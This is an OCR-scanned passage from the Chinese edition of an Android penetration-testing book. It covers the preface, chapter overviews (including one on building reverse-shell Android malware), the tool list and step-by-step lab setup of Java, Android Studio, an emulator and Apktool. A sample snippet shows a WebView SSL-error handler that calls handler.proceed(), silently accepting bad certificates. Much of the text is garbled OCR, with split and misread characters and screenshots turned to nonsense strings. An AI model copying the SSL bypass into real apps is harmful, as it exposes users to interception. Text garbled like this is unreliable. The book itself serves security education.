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内 容 提 要 


本 书 以 搭建 安 卓 安全 所 需 的 实验 环境 开篇 ， 首 先 介 绍 了 ROOT 安 章 设备 的 常用 工具 和 技术 ， 并 分 析 了 
安 卓 应 用 的 基本 架构 ， 接 着 从 数据 存储 、 服 务 器 端 、 客 户 端 等 方面 讲解 了 安 卓 应 用 可 能 面临 的 安全 风险 ; 
最 后 给 出 了 一 些 避 人 免 恶意 攻击 的 方法 。 另 外 ， 本 书 还 涉及 了 多 个 案例 ， 步 又 详实 ， 通俗 易 懂 。 

本 书 适合 想 了 解 安 卓 安全 的 读者 、 移 动 开 发 人 员 、 软 件 工 程 师 和 QA 专家 等 。 
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移动 安全 是 当下 最 热门 的 话题 之 一 。 作 为 市 场 上 领先 的 移动 操作 系统 , 安 卓 拥有 极其 广泛 的 
用 户 基础 ， 大 量 的 个 人 数据 和 商业 数据 都 存储 在 安 卓 移动 设备 上 。 移 动 设备 给 人 们 带 来 了 娱乐 、 
商业 、 个 人 生活 ， 同 时 也 带 来 了 新 的 风险 ， 针 对 移动 设备 和 移动 应 用 的 攻击 日 益 增 加 。 作 为 用 户 
群 最 大 的 平台 , 安 卓 自然 成 为 攻击 者 首选 的 攻击 目标 。 本 书 将 深入 研究 各 种 攻击 技术 ,以 便 玫 助 
开发 人 员 、 渗 透 测试 人 员 以 及 终端 用 户 了 解 安 卓 安全 的 基本 原理 。 














第 1 章 “ 实 验 环境 搭建 ”是 本 书 的 基础 部 分 。 这 一 章 将 会 指导 读者 搭建 一 个 环境 ， 其 中 塞 括 
了 后 面 各 章 所 需 的 所 有 工具 。 对 于 不 了 解 安 卓 安 全 技术 的 读者 来 说 ， 这 一 章 属 于 基础 入 门 部 分 ， 
将 指导 他 们 安装 安 卓 安全 所 需 的 一 系列 工具 。 


第 2 章 “ 安 章 ROOT” 介 绍 ROOT 安 上 章 设 备 的 常见 技术 。 这 一 章 将 介绍 ROOT 的 基础 知识 ， 并 
分 析 其 利 郊 ， 之 后 讨论 安 卓 的 分 区 布局 、boot loader 以 及 boot loader 解 锁 技 术 等 话题 。 这 一 章 将 
指导 读者 如 何 ROOT 自 己 的 设备 ， 并 了 解 ROOT 概 念 的 来 龙 去 脉 。 


第 3 章 “ 安 卓 应 用 的 基本 构造 ”概述 安 卓 应 用 的 内 部 构造 。 应 用 在 底层 是 如 何 构造 的 ， 当 它 
们 被 安装 到 设备 上 时 是 什么 样子 ， 又 是 如 何 运行 的 ,等 等 ， 了 解 这 些 知 识 非常 有 必要 ， 而 这 也 正 
是 这 一 前 所 涵盖 的 内 容 。 


第 4 章 “ 安 卓 应 用 攻击 概览 ”概述 安 卓 的 攻击 面 。 这 一 童 将 讨论 安 卓 应 用 、 安 卓 设 备 以 及 安 
卓 应 用 结构 体系 中 其 他 组 件 可 能 遭受 的 攻击 。 更 重要 的 是 , 指导 读者 针对 通过 网 络 与 数据 库 通 信 
的 传统 应 用 构建 一 个 简易 威胁 模型 。 了解 应 用 可 能 遭受 的 攻击 对 于 理解 渗透 测试 的 测试 内 容 十 分 
重要 。 这 一 章 对 上 述 内 容 进 行 了 高 度 概括 ， 只 包含 少量 技术 细节 。 


第 5 章 “ 数 据 存储 与 数据 安全 ”介绍 评估 安 卓 应 用 数据 存储 安全 的 常见 技术 。 数 据 存 储 是 
安 卓 应 用 开发 中 最 重要 的 部 分 之 一 。 这 一 童 将 首先 讨论 开发 者 在 本 地 存储 数据 时 所 使 用 的 不 同 
技术 ,以 及 这 些 技术 对 安全 性 的 影响 。 然 后 ,具体 曾 述 开 发 者 所 选用 的 数据 存储 技术 对 安全 性 
的 影响 。 





















































































































































第 6 章 “ 服 务 器 端 攻 击 ” 概 述 在 服务 器 端 安 草 应 用 的 攻击 面 。 这 一 章 将 高 度 概 括 安 卓 应 用 后 
端 可 能 遭受 的 攻击 ， 并 包含 了 少量 的 技术 细节 ， 因 为 大 部 分 服务 器 端 漏洞 都 与 Web 攻 击 有 关 。 
OWASP 测 试 和 开发 者 指南 已 经 详细 介绍 了 Web 攻 击 。 


第 7 章 “ 客 户 端 攻击 一 一 静态 分 析 技 术 ” 从 静态 应 用 安全 测试 (SAST ) 的 角度 介绍 各 种 客户 
端 攻击 。 静态 分 析 是 一 种 通过 可 轻易 获得 的 安 卓 逆向 工具 来 鉴别 安 卓 应 用 漏洞 的 通用 技术 。 这 一 
章 还 将 讨论 一 些 用 于 对 安 卓 应 用 进行 静态 分 析 的 自动 化 测试 工具 。 


第 8 章 “ 客 户 端 攻击 一 一 动态 分 析 技 术 ” 将 介绍 动态 应 用 安全 测试 (DAST ) 中 用 于 评估 和 利 
用 安 卓 应 用 客户 端 漏洞 的 一 些 常 用 工具 和 技术 。 另 外 , 还 会 讨论 Xposed 、Frida 等 在 运行 时 操控 应 
用 的 工具 。 

第 9 童 “ 安 卓 恶意 软件 ”将 介绍 创建 和 分 析 安 卓 恶 意 软件 的 常用 基础 技术 。 这 一 章 将 首先 介 
绍 传统 安 卓 恶意 软件 的 特征 , 然后 讨论 如 何 创建 一 个 简单 的 恶意 软件 , 并 用 于 在 受 感染 的 手机 上 
给 攻击 者 一 个 反弹 shell。 最 后 讨论 安 卓 恶意 软件 的 分 析 技 术 。 

第 10 章 “针对 安 卓 设备 的 攻击 ”试图 帮助 用 户 在 日 常 使 用 中 免 受 攻 击 , 壁 如 在 咖啡 店 和 机 场 
连接 免费 Wi-Fi 时 ,如何 免 受 攻 击 。 这 一 章 还 将 解释 为 什么 ROOT 安 卓 设备 和 安装 未 知 来 源 的 应 用 
是 不 安全 的 。 








































































































阅读 准备 
为 了 在 阅读 本 书 的 同时 能 亲自 体验 , 读者 需要 安装 下 列 软件 。 下 载 链接 和 安装 步 又 将 在 后 面 

说 明 。 

Q Android Studio 

O 安 卓 模拟 器 

Q Burp Suite 

Q Apktool 

Q Dex2jar 

Q JD-GUI 

Q Drozer 

Q GoatDroid 

QO QARK 

Q Cydia Substrate 

Q Introspy 

口 Xposed 框 架 

口 Frida 
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读者 对 象 


本 书 适 合 想 了 解 安 卓 安全 的 读者 ， 对 软件 工程 师 、QA 专 业 人 员 、 初 级 及 中 级 安全 专业 人 土 








都 有 带 助 。 如 果 有 一 些 安 卓 编程 基础 更 佳 。 














排版 约定 


在 本 书 中 ,你 会 看 到 一 些 不 同 的 文本 样式 ,用 以 区 分 不 同类 型 的 信息 。 下 面 举例 说 明 一 些 样 





式 的 具体 含义 。 








文中 的 代码 、 数 据 库 表 名 、 用 户 输入 等 将 使 用 如 下 样式 :“ 内 容 提 供 程序 使 用 标准 的 








insert () query(), 、update() 和 delete() 等 方法 来 
代码 段 的 格式 如 下 : 
@Override 
public void onReceivedSslError(WebView view, Ss 
SslError error) 
{ 
handler.proceed(); 
} 
代码 段 中 需要 重点 关注 的 部 分 将 会 加 粗 : 
if(!URL.startsWith("file:")) { 


命令 行 输入 和 输出 格式 如 下 : 


$ adb forward tcp:27042 tcp:27042 
$ adb forward tcp:27043 tcp:27043 


此 图 标 表示 警告 或 重要 提示 。 


my) 
| Q 此 图 标 表示 提示 和 技巧 。 


获取 应 用 数据 。 


lErrorHandler handler, 


La | 


我 们 非常 欢迎 读者 的 反馈 。 让 我 们 知道 你 对 本 书 的 想法 一 一 喜欢 哪些 部 分 ， 或 不 喜欢 哪些 部 





分 。 你 的 反馈 将 会 帮助 我 们 开发 能 够 真正 被 大 家 充分 利 月 


你 可 以 发 送 邮件 到 feedback@packtpub.com 进 行 反馈 ， 





日 的 图 书 。 
并 在 邮件 主题 中 注 明 书 名 。 




















如 果 你 对 某 一 个 主题 有 专业 的 见解 ,而 且 有 兴趣 创作 或 者 为 一 本 书 做 出 贡献 ,请 参考 我 们 在 
www.packtpub.com/authors 上 的 作者 指南 。 














用 户 支 持 及 说 明 

我 们 将 为 本 书 的 读者 提供 最 大 的 帮助 , 使 读者 能 从 本 书 中 获得 最 大 的 收获 。 本 书 旨 在 深入 研 
究 各 种 攻击 技术 ,任何 未 经 所 有 者 许可 而 攻击 其 系统 的 做 法 均 属 非法 行为 。 
下 载 示 例 代码 





读者 可 以 通过 账号 从 http://www.packtpub.com 下 载 示 例 代 码 。 如 果 你 是 从 别处 购买 的 本 书 ， 
则 可 以 访问 http:/www.packtpub.com/support, 并 注册 账号 , 所 有 文件 将 会 通过 邮件 直接 发 送 给 你 。 


可 以 按照 下 面 的 步 又 下 载 代 码 文件 : 


(1) 使 用 你 的 邮箱 和 邮箱 密码 登录 我 们 的 网 站 或 者 注册 账号 ; 
(2) 将 鼠标 移动 到 网 站 顶部 的 SUPPORT 选 项 卡 ; 

(3) 点 击 Code Downloads & Errata; 

(4) 在 搜索 框 输入 书 名 ; 

(5) 选中 你 要 下 载 代码 文件 的 图 书 ; 

(6) 在 下 拉 菜 单 中 选择 购买 渠道 ; 

(7) 点 击 Code Download。 


也 可 以 访问 本 书 在 Packt 出 版 社 官方 网 站 的 页 面 ， 点 击 网 页 上 的 Code Files 按 钮 进行 下 载 。 你 
可 以 通过 在 搜索 框 中 输入 书 名 找到 该 页 面 。 注 意 ， 你 要 登录 Packt 账 号 才能 下 载 。 


文件 下 载 完成 后 ， 使 用 下 列 软件 的 最 新 版 将 下 载 的 文件 解压 或 导出 。 


口 Windows 平 台 : WinRAR/7-Zip 
O Mac 平 台 : Zipeg/iZip/UnRarX 
Q Linux 平 台 : 7-Zip/PeaZip 


























我 们 也 在 GitHub 上 托管 了 本 书 的 代码 : https://github.com/PacktPublishing/hacking-android o 
Packt 图 书 和 视频 的 代码 也 能 在 https:/github.com/PacktPublishing/ 上 找到 。 赶 紧 前 往 查 看 吧 ! 








勘误 表 
尽管 我 们 尽 了 最 大 的 努力 来 保证 书 中 内 容 的 准确 性 , 但 差错 还 是 在 所 难免 。 如 果 你 发 现 了 书 
中 的 错误 , 不 论 是 正文 还 是 代码 ,并 且 能 够 反馈 给 我 们 , 我们 将 十 分 感激 。 这 么 做 不 仅 能 解决 其 
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他 读者 的 困惑 ， 也 能 帮助 我 们 在 本 书后 续 版 本 中 进行 改进 。 如 果 你 发 现 了 错误 ， 可 以 访问 
http:Wwww.packtpub.com/submit-errata ， 选 择 相 应 的 图 书 ， 点 击 Errata Submission Form 链 接 ， 填 写 
勘误 详情 。 一旦 勘误 审核 通过 , 你 的 提交 将 会 被 接受 , 并 上 传 到 我 们 的 网 站 或 者 添加 到 现 有 勘误 
表 中 。 


查看 之 前 读者 提交 的 勘误 表 , 请 访问 https://www.packtpub.com/books/content/support， 并 在 搜 
索 框 中 输入 书 名 查询 。 所 需 的 信息 将 会 显示 在 Errata 下 面 。 















































盗版 行为 


对 于 所 有 媒体 而 言 ， 网 络 盗版 行为 是 一 个 长 期 存在 的 问题 。 对 Packt 而 言 ， 我 们 将 严格 保护 
自身 的 版 权 和 许可 证 。 如 果 你 在 网 络 上 发 现 Packt 作 品 的 任何 非法 副本 ， 请 立即 将 网 址 或 网 站 名 
称 告诉 我 们 ， 以 便 我 们 采取 补救 措施 。 


请 将 涉嫌 盗版 的 链接 通过 邮件 发 送 至 copyright@packtpub.com。 
感谢 读者 保护 我 们 的 作者 ， 保 护 我 们 为 读者 提供 有 价值 内 容 的 能 















































读者 提问 


如 果 读 者 对 于 本 书 内 容 有 任何 疑问 ， 可 以 通过 邮箱 questions@packtpub.com 联 系 我 们 ， 我 们 
将 尽 最 大 的 努力 帮助 读者 解决 问题 。 





























电子 书 
扫描 如 下 二 维 码 ， 即 可 购买 本 书 电子 版。 
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Srinivasa Rao Kotipalli 的 致谢 
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实验 环境 搭建 








在 本 童 中 ， 我 们 将 搭建 一 个 实验 环境 ， 其 中 包含 后 续 童 节 所 需 的 各 种 工具 。 对 于 不 了 解 
安 卓 安全 技术 的 读者 来 说 ， 本 章 属 于 基础 入门 部 分 。 它 将 指导 我 们 安装 所 需 的 一 系列 安 卓 安 全 
工具 。 


























下 面 是 本 章 将 要 讨论 的 主要 内 容 。 


口 设置 安 旨 环境 

口 安装 应 用 评估 所 需 的 工具 

口 安装 评估 移动 设备 后 端 安全 所 需 的 工具 
口 安装 易 受 攻击 的 应 用 

口 Android Debug Bridge (adb ) “介绍 











1.1 安装 工具 


本 节 将 介绍 后 续 章 节 会 用 到 的 各 种 工具 。 首 先 ， 安 装 用 于 开发 安 卓 应 用 的 Android Studio; 
然后 ， 创 建 一 个 安 草 虚拟 机 ( AVD ); 最 后 ， 安 装 用 于 评估 安 卓 应 用 和 设备 安全 性 的 必要 工具 。 
本 节 介 绍 的 大 部 分 安装 步骤 都 是 针对 Windows 平 台 的 ， 如 果 是 针对 其 他 平台 的 工具 ， 会 特别 
指出 。 








Java 





像 Android Studio 和 Burp Suite 这 样 的 工具 都 离 不 开 Java。 因 此 ， 先 从 下 面 的 链接 下 载 并 安装 
Java: https://java.com/zh_CN/download/. 





下 面 是 安装 Java 的 步骤 。 





(1) 运行 安装 程序 。 

















D 安 卓 操作 系统 与 桌面 计算 机 间 沟 通 的 一 个 命令 行 工具 。 一 一 译 者 注 

















Je 


2 第 1 章 ， 实验 环境 搭建 








| 34) Java SE Development Kit 8 Update 60 (64-bit) - Setup L J 


Welcome to the Installation Wizard for Java SE Development Kit 8 Update 60 





This wizard will quide you through the installation process for the Java SE Development 
Kit 8 Update 60. 











The Java Mission Control profiling and diagnostics tools suite is now available as part of 
the JDK. 





(2) 如 果 需 要 修改 安装 路 径 ， 勾 选 Change 按 钮 ， 选 择 目 标 文件 夹 。 和 否则， 保留 默认 设置 即 可 。 
点 击 Next 按 钮 ， 会 出 现 如 下 图 所 示 的 界面 。 


mm 
Java Setup - Destination Folder o|- a 


¢ 


= Java’ 


ORACLE 





Destination Folder 


Click "Change" to install Java to a different folder. 


C:\Program Files\Java\jrel.8.0_60 























(3) 点击 Next 按 钮 ， 进 入 安装 界面 。 
Java Setup - Progress [© | = So 











Status: Installing Java 
ey j 


3 Billion 


Devices Run Java 





G 
= Java’ #1 Development Platform ORACLE 




















(4) 出 现 如 下 图 所 示 的 界面 表示 安装 完成 。 











r 
H Java SE Development Kit 8 Update 60 (64-bit) - Complete =] 






Java SE Development Kit 8 Update 60 (64-bit) Successfully Installed 


Click Next Steps to access tutorials, API documentation, developer guides, release notes 
and more to help you get started with the JDK. 
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(5) 点 击 Close 按 钮 ， 完 成 安 


情况 。 到 这 里 














。 打 开 新 的 命令 提示 符 并 运行 下 面 的 命令 ， 可 检查 Java 的 安装 
sheep A MARE 








y Nsrini>java 
java version "1.8.0 


-version 
6" 


IC:NUsersNsriniy> 





1.2 Android Studio 
下 一 个 要 安装 








12 月 发 布 第 一 个 稳定 版 : 1.0 版 。 








= 


Microsoft Windows [Uersion 6.1.76661] 
Copyright <c> 2009 Microsoft Corporation. 


All rights reserved. 


avacTMy SE Runtime Environment Cbuild 1.8.0_68-b27> 
Java HotSpot<TM> 64-Bit Server UM Chuild 25.66-hb23. 


mixed mode> 





的 工具 是 Android Studio, Android Studiodé-F IntelliJ IDEA , 
官方 IDE。 在 Android Studio 出 现 之 前 ，Eclipse 曾 是 安 卓 应 用 开发 的 IDE。Android Studio F20134F5 
月 发 布 了 0.1 版 ， 从 此 进入 了 早期 预览 阶段 ; 2014 年 6 








月 发 布 了 0.8 版 ， 进 入 Beta 测 试 阶段 ;2014 年 

















是 安 卓 应 用 开发 的 








请 从 下 面 的 网 址 中 下 载 并 安装 Android Studio: https://developer.android.com/sdk/index.html。 


4 安装 


(1) 下 载 Android Studio 并 运 和 


Android Studio Setup 


装 程序 。 





Be] 


miim 





Android 
Studio 








Welcome to Android Studio Setup 


Setup will guide you through the installation of Android 
Studio. 


It is recommended that you dose all other applications 
before starting Setup. This will make it possible to update 
relevant system files without having to reboot your 
computer. 


Click Next to continue. 





Next > Cancel 


| | 


< Back || 
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(2) 点 击 Next 直 到 出 现下 图 中 的 界面 。 | 


r 








® Android Studio Setup = 















Choose Components 
Choose which features of Android Studio you want to install. 





Check the components you want to install and uncheck the components you don't want to 
install. Click Next to continue. 










Select components to install: seats Pia. 
回 Android SDK sept healers 
[V] Android Virtual Device e its description, 
[V] Performance (Intel® HAX 





Space required: 4.2GB 




















b 


这 个 窗口 展示 了 可 安装 的 工具 选项 。 建 议 全 选 ， 并 安装 Android SDK, Android Virtual Device 
和 Intel@HAXM。Intel@HAXM 能 为 Android Studio 中 的 x86 模 拟 器 提供 硬件 加 速 和 必需 的 支持 。 


(3) 点 击 I Agree 同 意 许可 协议 ， 并 继续 安装 。 








Android Studio Setup = E 





License Agreement 


Please review the license terms before installing Android Studio. 











< Back | I Agree Cancel 
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(4) 选择 Android Studio 和 Android SDK 的 安装 路 径 。 如 果 没 有 特定 的 选择 ， 保 留 默认 路 径 即 
可 。 记 录 Android SDK 的 安装 位 置 ， 并 将 其 添加 到 系统 环境 变量 中 ， 这 样 就 可 以 在 任何 地 方 使 用 
命令 提示 符 访问 adb 、sqlite3 客 户 端 以 及 其 他 工具 。 





5 Android Studio Setup = [| 















Configuration Settings 
Install Locations 





Android Studio Installation Location 
The location specified must have at least SOOMB of free space. 


Click Browse to customize: 
C:\Program Files\Android\Android Studio 
Android SDK Installation Location 


The location specified must have at least 3.2GB of free space. 
Click Browse to customize: 


C:\Users\srini\AppData \Local \Android \sdk 

















(5) 根据 系统 内 存 分 配 RAM， 建 议 不 低 于 2 GB. 


ES 
5 Android Studio Setup Lo |) bento 


Configuration Settings 
Emulator Setup 











We have detected that your system can run the Android emulator in an accelerated 
performance mode. 


Please set the maximum amount of RAM available for the Intel Hardware Accelerated 
Manager (HAXM) to use for all x86 emulator instances. 


You can change these settings at any time. Please refer to the Intel HAXM Documentation 
for more information. 


@ Recommended: 2GB 
© Custom: 2 GB 
* This value must be between 512 MB and 5 GB 


Note: Setting aside a large memory reservation may cause other programs to run slowly 
when using the x86 Android emulator with HAXM. 
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(6) 选择 Android Studio 在 开始 菜单 中 的 名 称 。 同 样 ， 如 果 没 有 特定 的 选择 ， 保 留 默 认 设 置 ee 


即 可 。 














Android Studio Setup 





Android Studio 


Choose Start Menu Folder 
Choose a Start Menu folder for the Android Studio shortcuts. 


Select the Start Menu folder in which you would like to create the program's shortcuts. You 
can also enter a name to create a new folder. 





Accessories 
Administrative Tools 
AVAST Software 
Dropbox 

Games 

Google Chrome 


Java 

Java Development Kit 
Maintenance 

Orade VM VirtualBox 


Intel Driver Update Utility 


m 











|Do not create shortcuts 





| < Back II Install | [ 


Cancel | 




















(7) 点 击 Next 按 钮 ， 继 续 安 装 ， 








直到 出 现 如 下 界面 。 至 此 ， 就 完成 了 Android Studio 的 安装 。 





Android Studio Setup 


Android 
Studio 








Completing Android Studio Setup 


Android Studio has been installed on your computer. 


Click Finish to dose Setup. 


[F] Start Android Studio 


Finish | 














(8) 点 击 上 图 窗口 中 的 Finish 按 钮 , 会 出 现 如 下 图 所 示 的 窗口 。 如 果 你 
其 安装 路 径 可 导入 先前 的 设置 。 如 果 是 首次 在 本 机 安装 , 选择 “Ido not have a previous 


Studio, 选择 寺 






































version of Studio or I do not want to import my settings” 。 


安装 过 旧版 的 Android 
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网 Complete Installation = 





You can import your settings from a previous version of Studio. 





Specify config folder or installation home of the previous version of Studio: 


| [eu 


@ I do not have a previous version of Studio or I do not want to import my settings 


Lox] 























(9) 点 击 OK 按钮 ， 启 动 Android Studio ， 如 下 图 所 示 。 


a Android 
ZX Studio 


Powered by the IntelliJ Platform 





(10) 加 载 完成 后 ， 将 会 出 现 一 个 UI 主题 选择 窗口 。 选 择 一 个 主题 ， 然 后 点 击 Next 按 钮 。 


Ton 








® Android Studio Setup Wizard Sex) 


KB Select UI Theme 





© Intell) O Darcula 


module ) [src ) (© HelloWorld > 


EY HelloWorld.java x 


Bimport javax.swing.*; 
Gimport java.awt.*; 


public class HelloWorld { 
public HelloWorld() { 
JFrame frame = new JFrame("Hello wor 

JLabel label = new JLabel(); 
label. setFon: te (Serif” 


is) 





吕 Breakpoints 


+-HOB 
日 [V] @ Line breakpoints 
Er 














| Previous | Cancel Finish | 














1.2 Android Studio 


9 





(11) 在 上 图 的 窗口 中 点 击 Next 后 ， 将 会 下 载 最 新 版 的 SDK 组 件 和 模拟 器 ， 如 下 图 所 示 。 





® Android Studio Setup Wizard 


KB Downloading Components 


Downloading Android SDK Build-tools, revision 23.0.1 





Leks) 








Show Details 











| Previous 


Next | | Cancel | Finish 





























(12) 最 后 ， 点 击 Finish 按 钮 ， 会 出 现 如 下 界面 ， 这 样 就 完成 了 安装 。 





® Android Studio Setup Wizard 


/以 Downloading Components 


Far oon wao rnovarrcu vo CE rr PI or Har ore 


Installing Archives: 
Preparing to install archives 
Installing Android SDK Build-tools, revision 23.0.1 
Installed Android SDK Build-tools, revision 23.0.1 
Installing Android Support Repository, revision 20 
Installed Android Support Repository, revision 20 
Installing Google Repository, revision 21 
Installed Google Repository, revision 21 
Installing Android SDK Platform-tools, revision 23.0.1 
Stopping ADB server succeeded. 
Installed Android SDK Platform-tools, revision 23.0.1 
Stopping ADB server succeeded. 
Starting ADB server succeeded. 
Done. 4 packages installed. 
‘Android SDK is up to date. 
(Creating Android virtual device 
Android virtual device Nexus_S_API_23_x86 was successfully created 











| Previous 


[CE Coe) Ga) 
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(13) 点 击 Start a new Android Studio project， 创 建 一 个 新 的 示例 应 用 。 





® Android Studio Setup Wizard scossi - 





Os Welcome to Android Studio 


Recent Projects Quick Start 
Ee Start a new Android Studio project 


A Open an existing Android Studio project 


No Project Open Yet p 
Import an Android code sample 


S Check out project from Version Control 


EY Import project (Eclipse ADT, Gradle, etc.) 


Pi Configure 中 


[=f Docs and How-Tos > 














Android Studio 13.2 Build 1412178183. Check for updates now. 


(14) #£ Application name 中 输入 应 用 名 称 ， 比 如 HelloWorld。 同 时 选择 一 个 示例 公司 域名 ， 比 
如 test.com。 其 他 选项 保持 默认 设置 ， 然 后 点 击 Next 按 钮 。 

















[一 一 一 
| ® Create New Project 





New Project 


/以 Android Studio 


Configure your new project | 








Application name: | HelloWorld 


Company Domain: | testkom ] | 


Edit 











Package name: com.test.helloworld 











Project location: C:\Users\srini\AndroidStudioProjects\HelloWorld i | 
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(15) 下 面 的 窗口 显示 了 应 用 的 最 低 SDK 版 本 。 选 择 API 级 别 15 ， 


因为 它 能 支持 更 多 的 设备 。 | 








“3 


È Creste New Project 


BR Target Android Devices 


Select the form factors your app will run on 


Different platforms may require separate SDKs 

















Phone and Tablet 
Minimum SOK APIS: Andrord 403 QeeCreamSandench) B 
Lower API levels target more devices, but have fewer features available. By targeting APIS 
and later, your app will run on approximately 94.0% of the devices that are active on the 
Google Play Store. 
Help me choose 
DD Wear 
Minimum SDK [AP121: Andeoid 5.0 (Lollipop) a 
Ow 
Minimum SDK (API 2E Android 5. (Letipop) 17 | 
C) Android Aute 
Qownloss 


Minienuem SOK | >| 


Lemon) WE (cere) 一 














(16) 选择 Blank Activity， 然 后 点 击 Next 按 钮 ， 如 下 图 所 示 。 








g — 
“W® Create New Project 


人 以 Add an activity to Mobile 


Add No Activity 


Blank Activity Fullscreen Activity 





Master/Detail Flow 


Google Maps Activity 


Google Play Services Activity 


Login Activity 










Google AdMob Ads Activity 


ar 


Navigation Drawer Activity 














(eon) SS 








Cancel) [ Finin ] |f 
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(17) 给 activity 起 个 名 字 ， 也 可 以 保持 默认 设置 ， 这 里 我 们 选择 默认 设置 。 
[T cenn EEE cre 





Crestes a new blank activity with sn action ber. 








Blank Activity 


The name of the activity class to create 














\_ Ea =) en a | 





(18) 最 后 ， 点 击 Finish 按 钮 完成 设置 。 初 始 化 模拟 器 和 编译 Hello World 应 用 需要 一 些 时 间 。 






































































































































































[J Helioworid -[C\Users\srini AndroidStudioProjects HelloWorld] - [app] - .\app\sre\main\res\layout activity mainxml - Android Studio 13.2 eas 
File Edit View Navigate Code Analyze Refactor Build Run Tools VCS Window Help 
DHS +A XH AR G d Hwee RHR YR SRS He 了 Q 
E3 HelloWorld > Bapp) E sre) E main ) Ea res) E layout 区 activity mainam! 
fa © $ | #- I | © MainActivityjava x | FÈ activity mainxml x Ti 
5 
EM maa Palette HIF e neuss A> @apptneme 一 MainAdviy- ©- 23- Component Tree PEE 
a > manifests S 
起 D java E Layouts 国 . 回国 国 a Qang 7 5 Device Screen 3 
v Cares Famelga. [H] RelativeLayout = 
a LinearLayout (Horizontal) 国 TeaView - @string/hello world 3 
Hia LinearLayout (Vertical) i4 
aye TableLayout a 
司 TableR F} 
e > E menu = areri = 
F > E mipmap Updating indices... 
2 > E values i 
I> © Gradle Scripts A OPE ree eee IINER TAHETI FE 
2 rour 
v Properties 7 Oo YF 
layout:height match_parent 
2 Small Button spe 
H RadioButton accessibilityLiveRegion 
C CheckBox accessibilityTraversalAfte 
x m Switch accessibilityTraversalBefc 
“4 m ToggleButton alpha 
= 局 ImageButton 
S 国 Imageview background 
= == ProgressBar (Large) backgroundTint 
a ie Fite backaroundTintMode 
Š al Design | Tet 
[E Terminai of 6: Android [E 0: Messages TODO E Eventlog [E] Gradle Console 
Gradle build finished in 22s 243ms (24 minutes ago) n/a | n/a Context: <no contet> ù $ 





EEEH O PIA AAEREN EEG SP Ie PN E EATER AE 


中 运行 的 。 











1.3 安装 安 卓 虚拟 机 


为 了 获得 本 书 中 大 部 分 概念 的 实际 操作 体验 , 你 必须 有 一 个 能 正常 运行 的 模拟 器 或 真实 的 安 
卓 设备 (最 好 是 ROOT 过 的 设备 ) 。 接 下 来 ,我们 将 利用 前 面 安装 好 的 工具 创建 一 个 模拟 器 。 


(1) 点 击 Android Studio 界 面 顶端 的 AVD Manager 图 标 ， 如 下 图 所 示 。 


ie AVD Manager 


T BGE # ? 


























(2) 随后 会 出 现 如 下 图 所 示 的 窗口 ， 你 能 看 到 一 个 默认 模拟 器 ， 这 个 模拟 器 是 在 安装 Android 
Studio 的 过 程 中 创建 的 。 





® Android Virtual Device Manager eS 


Your Virtual Devices 


| 
Android Studio 





Type Name Resolution API Target CPU/ABI Size on Disk Actions 
O News 5 api 23x86 1080 x 1920: xxhdpi 23 Google APIs x86 750 MB pr 











十 Create Virtual Device... | 


(3) 点 击 上 图 界面 左下 角 的 Create Virtual Device 按 钮 ， 出 现 如 下 图 所 示 的 界面 。 
































® Virtual Device Configuration Eq 
Select Hardware 
Che 
) [DD Nexus 5 
Sze Resolution Density 
40" 480x800 hdpi 
1osopx 
37" 480x800 hdpi Size: normal 
Ratio: notlong 
Wear Nexus 6P sr 14402560 560dpi Density: ohdpi 
v Nexus 6 5.96" 14402560 560dpi ey | 
Nexus 5X 52° 1080x1920 420dpi 
| 
| 
Nexus 4 ar 768x1280 xhdpi 
Galaxy Nexus 465" 7201280 xhdpi 
5.4" FWVGA 54" 480854 mdpi 
5.1" WGA 5 480x800 mdpi 
AT WXGA ar 7201280 xhdpi 
New Hardware Profile | | Import Hardware Profiles 区 [ Clone Device. | 
Previou | | Cancel} | Frish | 
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(4) 选择 设备 。 本 书 选择 一 个 如 下 规格 的 设备 ， 创 建 一 个 小 屏 模拟 器 。 


seg ca A 


(5) 点 击 Next 按 钮 ， 将 出 现 如 下 图 所 示 的 窗口 。 如 果 选 择 Show downloadable system Images, 
你 会 看 到 更 多 的 系统 镜像 选项 。 我 们 暂时 选择 默认 的 x86。 














| GS SDK Manager 帮 助 我 们 管理 系统 中 安装 的 所 有 系统 镜像 和 SDK。 





@ Virtual Device Configuration | x || 


Gx System Image 


Select a system image 





Release Name API Level» | ABI | Target 
ES o 


API Level 


ge 23 
O bd 
6.0 
mi Google Inc. 


System Image 


x86 





Questions on API level? 


[C Show downloadable system images fs) See the API level distribution chart 








[Eee GEE Lone) Cae | 
(6) 最 后 给 安 卓 虚 拟 机 起 一 个 名 字 , 然后 点 击 Finish 按 钮 。 在 本 例 中 , 我 们 将 它 命名 为 Lab Device. 


® Virtual Device Configuration 











Android Virtual Device (AVD) 


rp Verify Configuration 














AVD Name [Lab Devied ] Avonia 
[E 32° HVGA slider (ADP1) 3.2" 320x480 mdpi | Change... | 
Thename of this AVD. 
2 Marshmallow Android 6.0 x86 | Change... | 
Startup size 
and Scale: 
orientation 


Emulated 
Performance 





Device Frame 


| Show Advanced Settings 








D (em) [Genel 








(7) EMER, HAA — Ta PASTAS HET o 








Type | Name Resolution API Target CPU/ABI Size on Disk Actions 
(stab Device 320 x 480: mdpi 23 Google APIs x86 650 MB pr 
O Nexus 5 API 23 x86 1080 x 1920: ohdpi 23 Google APIs x86 750MB > 











(8) 选择 想 要 的 模拟 句 ， 点 击 Play 按 钮 ， 启 动 模拟 器 。 





Starting AVD... 
K 











Background 





一 切 准 备 就 绪 之 后 ， 你 会 看 到 一 个 模拟 器 ， 如 下 图 所 示 。 


下 5554:Lab_Device - 3 





Calendar Camera Clock Contacts 


se 
g g 


Custom Loc.. Dev Settings Dev Tools Downloads 


D >A 


Gallery Gestures Bui.. Maps 


OALA 


Messenger Music Phone Search 


E -一 
+ 














1.3.1 真实 设备 
建议 你 准备 一 个 真实 设备 ， 与 模拟 器 一 起 用 于 学 习 本 书 中 的 一 些 概念 。 
我 曾经 使 用 已 经 ROOT 过 的 索尼 Xperia C1504 手 机 来 展示 一 些 真 机 效果 。 





























1.3.2 Apktool 
Apktool 是 安 卓 渗透 测试 人 员 必 备 的 工具 之 一 。 后面 我 们 将 利用 它 来 进行 安 卓 应 用 逆向 工程 ， 
以 及 通过 感染 合法 应 用 来 创建 恶意 软件 。 


从 下 面 的 链接 中 下 载 最 新 版 的 Apktool ( 请 下 载 Apktool 2.0.2 或 2.0.2 以 后 的 版 本 ， 以 避免 旧版 
本 中 存在 的 一 些 问题 ) : http://ibotpeaches.github.io/Apktool/. 





























下 载 Apktool 并 保存 在 C\APKTOOL 中 ， 如 下 图 所 示 。 


C:\APKTOOL>dir 
Volume in drive C is OS 
